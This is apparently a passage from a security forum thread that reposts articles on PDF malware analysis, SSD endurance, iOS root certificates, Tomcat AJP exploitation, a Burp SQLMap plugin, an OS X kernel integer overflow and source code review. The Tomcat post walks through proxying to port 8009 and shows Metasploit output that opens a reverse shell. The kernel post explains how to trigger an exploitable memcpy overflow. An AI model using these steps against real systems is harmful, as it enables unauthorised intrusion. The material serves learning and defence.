JavaScript One technique is using Didier Stevens suite of tools to analyze the content of the PDF and look for suspicious elements. One of those tools is Pdfid which can show several keywords used in PDF files that could be used to exploit vulnerabilities. The previously mentioned cheat sheet contain some of these keywords. In this case the first observations shows the PDF file contains 6 objects and 2 streams. No JavaScript mentioned but it contains /AcroForm and /XFA elements. This means the PDF file contains XFA forms which might indicate it is malicious. Then looking deeper we can use pdf-parser.py to display the contents of the 6 objects. The output was reduced for the sake of brevity but in this case the Object 2 is the /XFA element that is referencing to Object 1 which contains a stream compressed and rather suspicious. Following this indicator pdf-parser.py allows us to show the contents of an object and pass the stream trough one of the supporter filters (FlateDecode, ASCIIHexDecode, ASCII85Decode, LZWDecode and RunLengthDecode only) trough the –filter switch. The –raw switch allows to show the output in a easier way to read. The output of the command is redirected to a file. Looking at the contents of this file we get the decompressed stream. When inspecting this file you will see several lines of JavaScript that weren’t on the original PDF file. If this document is opened by a victim the /XFA keyword will execute this malicious code. Another fast method to find if the PDF file contains JavaScript and other malicious elements is to use the peepdf.py tool written by Jose Miguel Esparza. Peepdf is a tool to analyze PDF files, helping to show objects/streams, encode/decode streams, modify all of them, obtain different versions, show and modify metadata, execution of Javascript and shellcodes. When running the malicious PDF file against the last version of the tool it can show very useful information about the PDF structure, its contents and even detect which vulnerability it triggers in case it has a signature for it. 2nd Step – Deobfuscate Javascript The second step is to deobfuscate the JavaScript. JavaScript can contain several layers of obfuscation. in this case there was quite some manual cleanup in the extracted code just to get the code isolated. The object.raw contained 4 JavaScript elements between <script xxxx contentType=”application/x-javascript”> tags and 1 image in base64 format in <image> tag. This JavaScript code between tags needs to be extracted and place into a separated file. The same can be done for the chunk of base64 data, when decoded will produce a 67Mb BMP file. The JavaScript in this case was rather cryptic but there are tools and techniques that help do the job in order to interpret and execute the code. In this case I used another tool called js-didier.pl which is a Didier version of the JavaScript interpreter SpiderMonkey. It is essentially a JavaScript interpreter without the browser plugins that you can run from the command line. This allows to run and analyze malicious JavaScript in a safe and controlled manner. The js-didier tool, just like SpiderMonkey, will execute the code and prints the result into files named eval.00x.log. I got some errors on one of the variables due to the manual cleanup but was enough to produce several eval log files with interesting results. 3rd Step – Extract the shellcode The third step is to extract the shellcode from the deobfuscated JavaScript. In this case the eval.005.log file contained the deobfuscated JavaScript. The file among other things contains 2 variables encoded as Unicode strings. This is one trick used to hide or obfuscate shellcode. Typically you find shellcode in JavaScript encoded in this way. These Unicode encoded strings need to be converted into binary. To perform this isolate the Unicode encoded strings into a separated file and convert it the Unicode (\u) to hex (\x) notation. To do this you need using a series of Perl regular expressions using a Remnux script called unicode2hex-escaped. The resulting file will contain the shellcode in a hex format (“\xeb\x06\x00\x00..”) that will be used in the next step to convert it into a binary 4th Step – Create a shellcode executable Next with the shellcode encoded in hexadecimal format we can produce a Windows binary that runs the shellcode. This is achieved using a script called shellcode2exe.py written by Mario Vilas and later tweaked by Anand Sastry. As Lenny states ” The shellcode2exe.py script accepts shellcode encoded as a string or as raw binary data, and produces an executable that can run that shellcode. You load the resulting executable file into a debugger to examine its. This approach is useful for analyzing shellcode that’s difficult to understand without stepping through it with a debugger.” 5th Step – Analyze shellcode and determine what is does. Final step is to determine what the shellcode does. To analyze the shellcode you could use a dissasembler or a debugger. In this case the a static analysis of the shellcode using the strings command shows several API calls used by the shellcode. Further also shows a URL pointing to an executable that will be downloaded if this shellcode gets executed We now have a strong IOC that can be used to take additional steps in order to hunt for evil and defend the networks. This URL can be used as evidence and to identify if machines have been compromised and attempted to download the malicious executable. At the time of this analysis the file was no longer there but its known to be a variant of the Game Over Zeus malware. The steps followed are manual but with practice they are repeatable. They just represent a short introduction to the multifaceted world of analyzing malicious documents. Many other techniques and tools exist and much deeper analysis can be done. The focus was to demonstrate the 5 Steps that can be used as a framework to discover indicators of compromise that will reveal machines that have been compromised by the same bad guys. However using these 5 steps many other questions could be answered. Using the mentioned and other tools and techniques within the 5 steps we can have a better practical understanding on how malicious documents work and which methods are used by Evi. Two great resource for this type of analysis is the Malware Analyst’s Cookbook : Tools and Techniques for Fighting Malicious Code book from Michael Ligh and the SANS FOR610: Reverse-Engineering Malware: Malware Analysis Tools and Technique. Sursa: Malicious Documents – PDF Analysis in 5 steps | Count Upon Security
  15. The SSD Endurance Experiment: Only two remain after 1.5PB Another one bites the dust by Geoff Gasior — 11:35 AM on September 19, 2014 You won't believe how much data can be written to modern SSDs. No, seriously. Our ongoing SSD Endurance Experiment has demonstrated that some consumer-grade drives can withstand over a petabyte of writes before burning out. That's a hyperbole-worthy total for a class of products typically rated to survive only a few hundred terabytes at most. Our experiment began with the Corsair Neutron GTX 240GB, Intel 335 Series 240GB, Samsung 840 Series 250GB, and Samsung 840 Pro 256GB, plus two Kingston HyperX 3K 240GB drives. They all surpassed their endurance specifications, but the 335 Series, 840 Series, and one of the HyperX drives failed to reach the petabyte mark. The remainder pressed on toward 1.5PB, and two of them made it relatively unscathed. That journey claimed one more victim, though—and you won't believe which one. Seriously, you won't. But I'll stop now. To celebrate the latest milestone, we've checked the health of the survivors, put them through another data retention test, and compiled performance results from the last 500TB. We've also taken a closer look at the last throes of our latest casualty. If you're unfamiliar with our endurance experiment, this introductory article is recommended reading. It provides far more details on our subjects, methods, and test rigs than we'll revisit today. Here are the basics: SSDs are based on NAND flash memory with limited endurance, so we're writing an unrelenting stream of data to a stack of drives to see what happens. We pause every 100TB to collect health and performance data, which we then turn into stunningly beautiful graphs. Ahem. Understanding NAND's limited lifespan requires some familiarity with how NAND works. This non-volatile memory stores data by trapping electrons inside miniscule cells built with process geometries as small as 16 nm. The cells are walled off by an insulating oxide layer, but applying voltage causes electrons to tunnel through that barrier. Electrons are drawn into the cell when data is written and out of it when data is erased. The catch—and there always is one—is that the tunneling process erodes the insulator's ability to hold electrons within the cell. Stray electrons also get caught in the oxide layer, generating a baseline negative charge that narrows the voltage range available to represent data. The narrower that range gets, the more difficult it becomes to write reliably. Cells eventually wear to the point that they're no longer viable, after which they're retired and replaced with spare flash from the SSD's overprovisioned area. Since NAND wear is tied to the voltage range used to define data, it's highly sensitive to the bit density of the cells. Three-bit TLC NAND must differentiate between eight possible values within that limited range, while its two-bit MLC counterpart only has to contend with four values. TLC-based SSDs typically have lower endurance as a result. As we've learned in the experiment thus far, flash wear causes SSDs to perish in different ways. The Intel 335 Series is designed to check out voluntarily after a predetermined number of writes. That drive dutifully bricked itself after 750TB, even though its flash was mostly intact at the time. The first HyperX failed a little earlier, at 728TB, under much different conditions. It suffering rash of reallocated sectors, programming failures, and erase failures before its ultimate demise. Counter-intuitively, the TLC-based Samsung 840 Series outlasted those MLC casualties to write over 900TB before failing suddenly. But its reallocated sectors started piling up after just a few hundred terabytes of writes, confirming TLC's more fragile nature. The 840 Series also suffered hundreds of uncorrectable errors split between an initial spate at 300TB and second accumulation near the end of the road. So, what about the latest death? Much to our surprise, the Neutron GTX failed next. It had logged only three reallocated sectors through 1.1PB of writes, but SMART warnings appeared soon after, cautioning that the raw read error rate had exceeded the acceptable threshold. The drive still made it to 1.2PB and through our usual round of performance benchmarks. However, its SMART attributes showed a huge spike in reallocated sectors: Over the last 100TB, the Neutron compensated for over 3400 sector failures. And that was it. When we readied the SSDs for the next leg, our test rig refused to boot with the Neutron connected. The same thing happened with a couple of other machines, and hot-plugging the drive into a running system didn't help. Although the Neutron was detected, the Windows disk manager stalled when we tried to access it. Despite the early warnings of impending doom, the Neutron's exit didn't go entirely by the book. The drive is supposed to keep writing until its flash reserves are used up, after which it should slip into a persistent read-only state to preserve user data. As far as we can tell, our sample never made it to read-only mode. It was partitioned and loaded with 10GB of data before the power cycle that rendered the drive unresponsive, and that partition and data remain inaccessible. We've asked Corsair to clarify the Neutron GTX's sector size and how much of the overprovisioned area is available to replace retired flash. Those details should give us a better sense of whether the drive ran out of spare NAND or was struck down by something else. For what it's worth, the other SMART attributes suggest the Neutron may have had some flash in reserve. The SMART data has two values for reallocated sectors: one that counts up from zero and another that ticks down from 256. The latter still hadn't bottomed out after 1.2PB, and neither had the life-left estimate. Hmmm. Although the graph shows the raw read error rate plummeting toward the end, the depiction isn't entirely accurate. That attribute was already at its lowest value after 1.108PB of writes, which is when we noticed the first SMART error. We may need to grab SMART info more regularly in future endurance tests. Now that we've tended to the dead, it's time to check in on the living... Articol complet: The SSD Endurance Experiment: Only two remain after 1.5PB - The Tech Report - Page 1
  16. An Analysis of the CAs trusted by iOS 8.0 Posted on September 22, 2014 by Karl Kornel iOS 8.0 ships with a number of trusted certificates (also known as “root certificates” or “certificate authorities”), which iOS implicitly trusts. The root certificates are used to trust intermediate certificates, and the intermediate certificates are used to trust web site certificates. When you go to a web site using HTTPS, or an app makes a secure connection to something on the Internet (like your mail server), the web site (or mail server, or whatever) gives iOS its certificate, and any intermediate certificates needed to make a “chain of trust” back to one of the roots. Using the fun mathematical property of transitivity, iOS will trust a web site’s certificate because it trusts a root certificate. iOS 8.0 includes two hundred twenty-two trusted certificates. In this post, I’m going to take a look at these 222 certificates. First I’m going to look at them in the aggregate, giving CA counts by key size and by hashing algorithm. Afterwards, I’m going to look at who owns these trusted roots. Perl is Awesome Before I go on, a quick shootout: Perl is awesome! I used a Perl script to parse Apple’s list, and to generate the numbers below. If you want the script, here it is: The quick-and-dirty Perl script (signature) The list of CAs (signature) Key Sizes The root certificates use either RSA or ECC for their keys. Here’s how the numbers break down: 4096-bit RSA: 44 CAs 2048-bit RSA: 138 CAs 1024-bit RSA: 27 CAs 384-bit ECC: 12 CAs 256-bit ECC: 1 CA On the RSA side, the numbers don’t surprise me too much. 1024-bit RSA is fading away, and a fair number of CAs moved to 4096-bit RSA keys, rather than move to ECC (or before ECC started to become prevalent for certificates). Even though RSA has the supermajority, ECC has gotten a foothold in the land of the CA, and that’s good, but I am concerned by the algorithm choices. The 256-bit ECC curve that one CA is using is identified as prime256v1. The 384-bit ECC curve that twelve CAs are using is secp384r1, also known as ansip384r1, or as P-384, the bigger brother to the infamous P-256. Neither of these curves are trustworthy, according to Safecurves. I would not be surprised if the number of ECC keys stays stable, and the number of RSA 4096-bit keys goes up. Most (if not all) of the widely-supported ECC algorithms (in web browsers and servers) are of the P-XXX variety. The safer route (for now, anyway) is to move up to 4096-bit RSA, while waiting (and advocating) for the inclusion of more trusted curves into web browsers and servers. Signature Hashes When we look as the hashing algorithms used to sign these root certificates, SHA is the order of the day: SHA-512: 1 CA SHA-384: 17 CAs (including 12 of the CAs using ECC keys) SHA-256: 42 CAs (including 1 of the CAs using ECC keys) SHA-1: 149 CAs MD-5: 10 CAs MD-2: 3 CAs First, some clarification: SHA-1 is a single algorithm. SHA-2 is a collection of algorithms, among which are SHA-256, SHA-384, and SHA-512. There are also other members of SHA-2, but they aren’t used here, so I’m ignoring them! Again we see the slow move away from SHA-1, and that’s good, but what really surprised me was the number of MD-5 certificates, and *gasp* there are still three MD-2 CAs? Really? Looking at MD-5, both Netlock and Thawte own three each, expiring in 2019 (for Netlock) and 2020 (for Thawte). GTE owns one (expiring in 2018), Equifax owns two (expiring in 2020), and one of them (owned by Globalsign) expired this January. Those all pale in comparison to the three MD-2 CAs, all owned by Verisign (the original “Class 1,2,3 Public Primary Certification Authority” CAs) and all expiring in 2028. Hey, crypto people, if you thought MD-2 was dead, you were wrong! This inclusion really surprises me: If you try to load your own MD-5 root certificate into iOS, it will not be trusted. And yet, iOS 8.0 ships with 13 CAs that use MD-5 (or older) algorithms. Update: As has been noted on Twitter, root certificate signatures are typically not validated by clients (browsers, OSes, etc.). Intermediates and lower certificate signatures are validated, but the root cert signatures are not. Certificate Owners Companies It is no surprise that the vast majority of CAs in iOS are owned by for-profit corporations. What interested me is just how many of those corporations seem to go a little overboard. The following vendors have more than 3 CAs in iOS 8.0: AC Camerfirma SA: 4 CAs Apple: 4 CAs Comodo: 4 CAs Digicert: 8 CAs Entrust: 5 CAs Geotrust: 4 CAs Globalsign: 6 CAs Netlock Kft: 5 CAs Symantec: 6 CAs TC Trustcenter GMBH: 6 CAs Thawte: 12 CAs The Usertrust Network: 5 CAs Verisign: 17 CAs All told, Symantec owns thirty-five CAs, thanks to Verisign’s purchase of Thawte, and Symantec’s purchase of Verisign. I don’t hold that against Symantec, though: Most of the CAs were issued before the purchase, and it’s too much trouble for all of their customers to switch over to Symantec roots. Even so, I really start to wonder: How many certificate authorities does one company actually need? Governments There are a number of governments whose CAs are included in iOS 8.0: China: 1 CA, via the China Internet Network Information Center Hong Kong: 1 CA, via the Hongkong Post e-Cert. Japan: 3 CAs, via GPKI and the Ministry of Public Management, Home Affairs, Posts, and Telecommunications (MPHPT) Netherlands: 3 CAs, via PKIoverheid Taiwan: 1 CA, via the Government Root Certification Authority Turkey: 1 CA, via the Scientific and Technological Research Council of Turkey United States: 5 CAs, via the Department of Defense Those were just the countries whose names I was able to pick out. When it comes to web sites, it looks like there’s no need to crack the encryption, and you probably don’t even need an inside line to Verisign! You can just issue your own faux-Microsoft cert (or faux-Google, or faux-Apple, or …) using one of your own governmental CAs, which iOS already recognizes. Unfortunately, I can not see any way (in Safari on iOS 8.0) to get information on the certificate chain for a web site. In other words, I can’t tell if the certificate for secure1.store.apple.com was issued by VeriSign, or if it was issued by the US Department of Defense. Safari does show the green URL bar and company name for EV certificates, but I have no way of knowing ahead of time that Apple uses an EV certificate for their sites. Final Thoughts First of all, it’s good that Apple has posted the list, and I do believe it to be a complete list. That said, I do wish there was a way in iOS Safari for me to see the details of the site’s certificate, and the chain from the certificate up to the root. Maybe this is something that could be implemented as an extension? The security-concious (or maybe security-paranoid?) will take note of the CAs that are using questionable ECC curves, and those CAs that are using MD-2 or MD-5 signature hashes. Other people will also take note of the countries whose governments have their CAs in iOS 8.0, making it so much easier for them to impersonate web sites of their choosing. There is no way to disable any of the root CAs that comes with iOS, so it is very much a take-it-or-leave-it situation. I wonder, is Android the same way, or does Android allow you to uninstall or disable CAs that you don’t like? With all the work that Apple does to secure iOS devices, that makes me trust Apple enough to take it. I’m going to continue using my iPhone 5, with iOS 8.0. Sursa: An Analysis of the CAs trusted by iOS 8.0 | Karl's Notes
  17. Run Android APKs on Chrome OS, OS X, Linux and Windows. Now supports OS X, Linux and Windows See the custrom ARChon runtime guide to run apps on other operating systems besides Chrome OS. Quick Demo for Chrome OS Download an official app, such as Evernote, from the Chrome Web Store. Then download this open source game: 2048.APK Game by Uberspot and load it as an unpacked extension. Press "Launch", ignore warnings. Sursa: https://github.com/vladikoff/chromeos-apk
  18. 8009, the forgotten Tomcat port We all know about exploiting Tomcat using WAR files. That usually involves accessing the Tomcat manager interface on the Tomcat HTTP(S) port. The fun and forgotten thing is, that you can also access that manager interface on port 8009. This the port that by default handles the AJP (Apache JServ Protocol) protocol: What is JK (or AJP)? AJP is a wire protocol. It an optimized version of the HTTP protocol to allow a standalone web server such as Apache to talk to Tomcat. Historically, Apache has been much faster than Tomcat at serving static content. The idea is to let Apache serve the static content when possible, but proxy the request to Tomcat for Tomcat related content. Also interesting: The ajp13 protocol is packet-oriented. A binary format was presumably chosen over the more readable plain text for reasons of performance. The web server communicates with the servlet container over TCP connections. To cut down on the expensive process of socket creation, the web server will attempt to maintain persistent TCP connections to the servlet container, and to reuse a connection for multiple request/response cycles It’s not often that you encounter port 8009 open and port 8080,8180,8443 or 80 closed but it happens. In which case it would be nice to use existing tools like metasploit to still pwn it right? As stated in one of the quotes you can (ab)use Apache to proxy the requests to Tomcat port 8009. In the references you will find a nice guide on how to do that (read it first), what follows is just an overview of the commands I used on my own machine. I omitted some of the original instruction since they didn’t seem to be necessary. (apache must already be installed) sudo apt-get install libapach2-mod-jk sudo vim /etc/apache2/mods-available/jk.conf # Where to find workers.properties # Update this path to match your conf directory location JkWorkersFile /etc/apache2/jk_workers.properties # Where to put jk logs # Update this path to match your logs directory location JkLogFile /var/log/apache2/mod_jk.log # Set the jk log level [debug/error/info] JkLogLevel info # Select the log format JkLogStampFormat "[%a %b %d %H:%M:%S %Y]" # JkOptions indicate to send SSL KEY SIZE, JkOptions +ForwardKeySize +ForwardURICompat -ForwardDirectories # JkRequestLogFormat set the request format JkRequestLogFormat "%w %V %T" # Shm log file JkShmFile /var/log/apache2/jk-runtime-status sudo ln -s /etc/apache2/mods-available/jk.conf /etc/apache2/mods-enabled/jk.conf sudo vim /etc/apache2/jk_workers.properties # Define 1 real worker named ajp13 worker.list=ajp13 # Set properties for worker named ajp13 to use ajp13 protocol, # and run on port 8009 worker.ajp13.type=ajp13 worker.ajp13.host=localhost worker.ajp13.port=8009 worker.ajp13.lbfactor=50 worker.ajp13.cachesize=10 worker.ajp13.cache_timeout=600 worker.ajp13.socket_keepalive=1 worker.ajp13.socket_timeout=300 sudo vim /etc/apache2/sites-enabled/000-default JkMount /* ajp13 JkMount /manager/ ajp13 JkMount /manager/* ajp13 JkMount /host-manager/ ajp13 JkMount /host-manager/* ajp13 sudo a2enmod proxy_ajp sudo a2enmod proxy_http sudo /etc/init.d/apache2 restart Don’t forget to adjust worker.ajp13.host to the correct host. A nice side effect of using this setup is that you might thwart IDS/IPS systems in place since the AJP protocol is somewhat binary, but I haven’t verified this. Now you can just point your regular metasploit tomcat exploit to 127.0.0.1:80 and take over that system. Here is the metasploit output also: msf exploit(tomcat_mgr_deploy) > show options Module options (exploit/multi/http/tomcat_mgr_deploy): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD tomcat no The password for the specified username PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used) Proxies no Use a proxy chain RHOST localhost yes The target address RPORT 80 yes The target port USERNAME tomcat no The username to authenticate as VHOST no HTTP server virtual host Payload options (linux/x86/shell/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.195.156 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic msf exploit(tomcat_mgr_deploy) > exploit [*] Started reverse handler on 192.168.195.156:4444 [*] Attempting to automatically select a target... [*] Automatically selected target "Linux x86" [*] Uploading 1648 bytes as XWouWv7gyqklF.war ... [*] Executing /XWouWv7gyqklF/TlYqV18SeuKgbYgmHxojQm2n.jsp... [*] Sending stage (36 bytes) to 192.168.195.155 [*] Undeploying XWouWv7gyqklF ... [*] Command shell session 1 opened (192.168.195.156:4444 -> 192.168.195.155:39401) id uid=115(tomcat6) gid=123(tomcat6) groups=123(tomcat6) References FAQ/Connectors - Tomcat Wiki AJPv13 Rajeev Sharma: Configure mod_jk with Apache 2.2 in Ubuntu Sursa: https://diablohorn.wordpress.com/2011/10/19/8009-the-forgotten-tomcat-port/
  19. Fedora 21 Alpha Is Out – Screenshot Tour The Fedora 21 Alpha can be downloaded from Softpedia By Silviu Stahie on September 24th, 2014 07:36 GMT The Fedora Project has announced that the first Alpha release for Fedora 21 is now available for download and testing, marking the beginning of a new journey for this famous distribution. The Fedora development team has been trying to get this Alpha release out the door for quite some time and they have been confronted with all sorts of problems that delayed the release. Now it's out and we get to test it properly. Users shouldn't get their hopes up for the final release of Fedora. The developers don't have the best track record at keeping a tight schedule for the upcoming builds, so it's very likely that the final iteration will also be pushed back.It's a new Fedora Fedora 21 is the first distribution in the series that doesn't have a code name. The previous release was called "Heisenbug." Not many users liked it, so they dropped the naming process entirely. Besides this simple move, the developers have also split the project into Fedora Server, Fedora Cloud, and Fedora Workstation. "The Alpha release contains all the exciting features of Fedora 21's products in a form that anyone can help test. This testing, guided by the Fedora QA team, helps us target and identify bugs. When these bugs are fixed, we make a Beta release available. A Beta release is code-complete and bears a very strong resemblance to the third and final release. The final release of Fedora 21 is expected in December." "We need your help to make Fedora 21 the best release yet, so please take some time to download and try out the Alpha and make sure the things that are important to you are working. If you find a bug, please report it - every bug you uncover is a chance to improve the experience for millions of Fedora users worldwide. Together, we can make Fedora a rock-solid distribution," say the developers.Get the Fedora 21 Alpha and test it As you can see, regular users should be interested in Fedora 21 Workstation, which is basically the desktop edition. The devs are tracking the GNOME 3.14 release and they will integrate it by default. Because the release has been delayed by a few weeks, it will no longer be among the first operating systems to adopt the new version of the GNOME desktop environment. Check the official announcement for more details about this build. You can download Fedora 21 right now from Softpedia. This is a Live CD and it seems to work just fine from a USB drive. If you decide to install it, please don't use a production machine, as the distro is still under development. Sursa: Fedora 21 Alpha Is Out – Screenshot Tour - Softpedia
  20. [h=1]SQLiPy: A SQLMap Plugin for Burp[/h] By codewatch On September 22, 2014 · Leave a Comment I perform quite a few web app assessments throughout the year. Two of the primary tools in my handbag for a web app assessment are Burp Suite Pro and SQLMap. Burp Suite is a great general purpose web app assessment tool, but if you perform web app assessments you probably already know because you are probably already using it. SQLMap complements Burp Suite nicely with its great SQL injection capabilities. It has astounded me in the past, as flexible and extensible as Burp is, that no one has written a better plugin to integrate the two (or maybe they did and I just missed it). The plugins that I have come across in the past fit in one of two categories: They generate the command line arguments that you want to run, and then you have to copy those arguments to the command line and run SQLMap yourself (like co2); or They kick off a SQLMap scan and essentially display what you would see if run in a console window (like gason) I’m not much of a developer, so I never really considered attempting to integrate the two myself until the other day that I was browsing in the SQLMap directory on my machine recently and noticed the file sqlmapapi.py. I’d never noticed it before (I’m not sure why), but when I did I immediately started looking into the purpose of the script. The sqlmapapi.py file is essentially a web server with a RESTful interface that enables you to configure, start, stop, and get the results from SQLMap scans by passing it options via JSON requests. This immediately struck me as an easy way in which to integrate Burp with SQLMap. I began researching the API and was very fortunate that someone already did the leg work for me. The following blog post outlines the API: Volatile Minds: Unofficial SQLmap RESTful API documentation. Once I had the API down I set out to write the plugin. The key features that I wanted to integrate were: The ability to start the API from within Burp. Note that this is not recommend as one of the limitations of Jython is that when you start a process with popen, you can’t get the PID, which means you can’t stop the process from within Jython (you have to manually kill it). A context menu option for sending a request in Burp to the plugin. A menu for editing and configuring the request prior to sending to SQLMap. A thread that continuously checks up on executed scans to identify whether there were any findings. Addition of information enumerated from successful SQLMap scans to the Burp Scanner Results list. All of those features have been integrated into this first release. I have limited ability to test so I appreciate anyone that can use the plugin and provide feedback. Some general notes on the plugin development: This is the first time I’ve attempted to develop a Burp plugin. The fact that I was able to do so with relative ease shows how easy the Burp guys have made it. This is also the first time I’ve used Jython, or used any Java GUI code. The code probably looks awful and I need more comments. See points 1 & 2 above and add in the fact that I’m not a developer. I reviewed the source code for numerous plugins to help me understand the nuances of working with Python/Jython/Java and integrating with Burp. The source of the following plugins was reviewed to help me understand how to build this: Payload Parser Burp SAML ActiveScan++ WCF Binary SOAP Handler WSDL Wizard co2 Articol complet: https://www.codewatch.org/blog/?p=402
  21. OS X IOKit kernel code execution due to integer overflow in IODataQueue::enqueue The class IODataQueue is used in various places in the kernel. There are a couple of exploitable integer overflow issues in the ::enqueue method: Boolean IODataQueue::enqueue(void * data, UInt32 dataSize) { const UInt32 head = dataQueue->head; // volatile const UInt32 tail = dataQueue->tail; const UInt32 entrySize = dataSize + DATA_QUEUE_ENTRY_HEADER_SIZE; <-- (a) IODataQueueEntry * entry; if ( tail >= head ) { // Is there enough room at the end for the entry? if ( (tail + entrySize) <= dataQueue->queueSize ) <-- ( { entry = (IODataQueueEntry *)((UInt8 *)dataQueue->queue + tail); entry->size = dataSize; memcpy(&entry->data, data, dataSize); <-- (c) The additions at (a) and ( should be checked for overflow. In both cases, by supplying a large value for dataSize an attacker can reach the memcpy call at (c) with a length argument which is larger than the remaining space in the queue buffer. The majority of this PoC involves setting up the conditions to actually be able to reach a call to ::enqueue with a controlled dataSize argument, the bug itself it quite simple. This PoC creates an IOHIDLibUserClient (IOHIDPointingDevice) and calls the create_queue externalMethod to create an IOHIDEventQueue (which inherits from IODataQueue.) This is the queue which will have the ::enqueue method invoked with the large dataSize argument. The PoC then calls IOConnectMapMemory with a memoryType argument of 0 which maps an array of IOHIDElementValues into userspace: typedef struct _IOHIDElementValue { IOHIDElementCookie cookie; UInt32 totalSize; AbsoluteTime timestamp; UInt32 generation; UInt32 value[1]; }IOHIDElementValue; The first dword of the mapped memory is a cookie value and the second is a size. When the IOHIDElementPrivate::processReport method is invoked (in response to an HID event) if there are any listening queues then the IOHIDElementValue will be enqueued - and the size is in shared memory The PoC calls the startQueue selector to start the listening queue then calls addElementToQueue passing the cookie for the first IOHIDElementValue and the ID of the listening queue. A loop then overwrites the totalSize field of the IOHIDElementValue in shared memory with 0xfffffffe. When the processReport method is called this will call IODataQueue::enqueue and overflow the calculation of entry size such that it will attempt to memcpy 0xfffffffe bytes. Note that the size of the queue buffer is also attacked controlled, and the kernel is 64-bit, so a 4gb memcpy is almost certainly exploitable. Note that lldb seems to get confused by the crash - the memcpy implementation uses rep movsq and lldb doesn't seem to understand the 0xf3 (rep) prefix - IDA disassembles the function fine though. Also the symbols for memcpy and real_mode_bootstrap_end seem to have the same address so the lldb backtrace looks weird, but it is actually memcpy. hidlib_enqueue_overflow.c 6.7 KB Download Sursa: https://code.google.com/p/google-security-research/issues/detail?id=39
  22. [h=3]5 Vulnerabilities That Surely Need a Source Code Review[/h] We have been performing Source Code Review (SCR) of multiple Java/JavaEE based Web Applications during the recent past. The results have convinced us and the customers that SCR is a valuable exercise that must be performed for business critical applications in addition to Penetration Testing. In terms of vulnerabilities, SCR has the potential to find some of the vulnerability classes that an Application Penetration Test will usually miss out. In this article we will provide a brief overview of some of the vulnerability classes which we frequently discover during an SCR that are missed out or very difficult to identify during Penetration Testing. Additionally we hope we will be able to provide answers for the following commonly asked questions: I have already performed an Application Penetration Test. Do I still need to conduct a Source Code Review for the same application? What are the vulnerabilities found during Source Code Review that are often missed by Application Penetration Test? Read More: Web Application Penetration Testing Service [h=3]Approach for Source Code Review[/h] The approach for SCR is fundamentally different from an Application Penetration Test. While an Application Penetration Test is driven by apparently visible use-cases and functionalities, the maximum possible view of the application in terms of its source code and configuration is usually available during an SCR. Apart from auditing important use-cases following standard practices, our approach consists of two broad steps: [h=4][/h] [h=4]Finding Security Weaknesses (Insecure/Risky Code Blocks) (Sinks)[/h] A security weakness is an insecure practice or a dangerous API call or an insecure design. Some examples of weaknesses are: Dynamic SQL Query: string query = "SELECT * FROM items WHERE owner = '" + userName + "' AND itemname = '" + ItemName.Text + "'"; Dangerous or risky API call such as RunTime.exec, Statement.execute Insecure Design such as using only MD5 hashing of passwords without any salt. [h=4]Correlation between Security Weakness and Dynamic Input[/h] Dynamic construction of an SQL Query without the necessary validation or sanitization is definitely a security weakness, however it may not lead to security vulnerability if the SQL query does not involve any untrusted data. Hence it is required to identify code paths that start with an user input and reaches a possibly weak or risky code block. The absence of this phase will leave huge number of false positive in the results. This step generally involves enumerating sources and finding a path between source to sink. A source in this case is any user controlled and untrusted input e.g. HTTP request parameters, cookies, uploaded file contents etc. [h=3]Five Vulnerabilities Source Code Review should Find[/h] [h=4]1. Insecure or Weak Cryptographic Implementation[/h] SCR is a valuable exercise to discover weak or below standard cryptography techniques used in applications such as: Use of MD5 or SHA1 without salt for password hashing. Use of Java Random instead of SecureRandom. Use of weak DES encryption. Use of weak mode of otherwise strong encryption such as AES with ECB. Susceptibility to Padding Oracle Attack. [h=4]2. Known Vulnerable Components[/h] For a small-medium scale JavaEE based application, 80% of the code that is executed at runtime comes from libraries. The actual percentage for a given application can be identified by referencing Maven POM file, IVY dependency file or looking into the lib directory. It is a very common possibility for dependent libraries and framework components to have known vulnerabilities especially if the application is developed over considerable time frame. As an example, during 2011, following two vulnerable components were downloaded 22 million times: Apache CXF with Authentication Bypass Vulnerability Spring Framework with Remote Code Execution Vulnerability During an SCR, known vulnerable components are easier to detect due to source code access and knowledge of exact version number of various libraries and framework components used, something that is lacking during an Application Penetration Testing. [h=4]3. Sensitive Information Disclosure[/h] An SCR should discover if an application in binary (jar/war) or source code form may disclose sensitive information that may compromise the security of the production environment. Some of the commonly seen cases are: Logs: Application logs sensitive information such as credentials or access keys in log files. Configuration Files: Application discloses sensitive information such as shared secret or passwords in plain text configuration files. Hardcoded Passwords and Keys: Many applications depend on encryption keys that are hardcoded within the source code. If an attacker manages to obtain even a binary copy of the application, it is possible to extract the key and hence compromise the security of the sensitive data. Email address of Developers in Comments: A minor issue, but hardcoded email addresses and names of developers can provide valuable information to attackers to launch social engineering or spear phishing attacks. [h=4]4. Insecure Functionalities[/h] An enterprise application usually goes through various transformations and releases. The application might have legacy functionality with security implications. An SCR should be able to find such legacy functionality and identify its security implications. Some of the examples of legacy functionalities with known security issues are given below: RMI calls over insecure channel. Kerberos implementation that are vulnerable to replay attack. Legacy authentication & authorization technique with known weaknesses. J2EE bad practices such as direct management of database/resource connection that may lead to a Denial of Service. Race condition bugs. [h=4]5. Security Misconfiguration[/h] SCR should be able to find common security misconfiguration in application and its deployed environment related to database configuration, frameworks, application containers etc. Some of the commonly discovered issues include: Application containers and database servers are running with highest (unnecessary) privilege. Default accounts with password enabled and unchanged. Insecure local file storage. [h=3]Additional Notes[/h] An in-depth Source Code Review exercise is a valuable activity that has significant additional benefits apart from those mentioned above. It is possible to conduct an in-depth review of implementation of security controls such as Cross-site Request Forgery (CSRF) prevention, Cross-site Scripting (XSS) prevention, SQL Injection prevention etc. It is not uncommon to find codes that lack or misuse such controls in a vulnerable manner resulting in bypass of protection. There are multiple APIs that are considered to be risky or insecure as per various secure coding guidelines. It is possible to discover usage of such API in a given application easily and quickly during an SCR process. SCR has the added benefit of being non-disruptive i.e. this activity does not require access to production environment and will not cause any service disruption. Source Code Review (SCR) is a valuable technique to discover vulnerabilities in your Enterprise Application. It discovers certain class of vulnerabilities, which are difficult to find by conventional Application Penetration Testing. However, it must be noted that Application Penetration Testing and Source Code Review are complementary in many ways and both independently contribute in enhancing overall security of application and infrastructure. Sursa: 5 Vulnerabilities That Surely Need a Source Code Review
  23. Da. "Daca compari un pointer la o functie cu un numar, eu fac automat conversia lor la string si le compar ca pe niste siruri de caractere" - Javascript Because fuck logic, that's why.
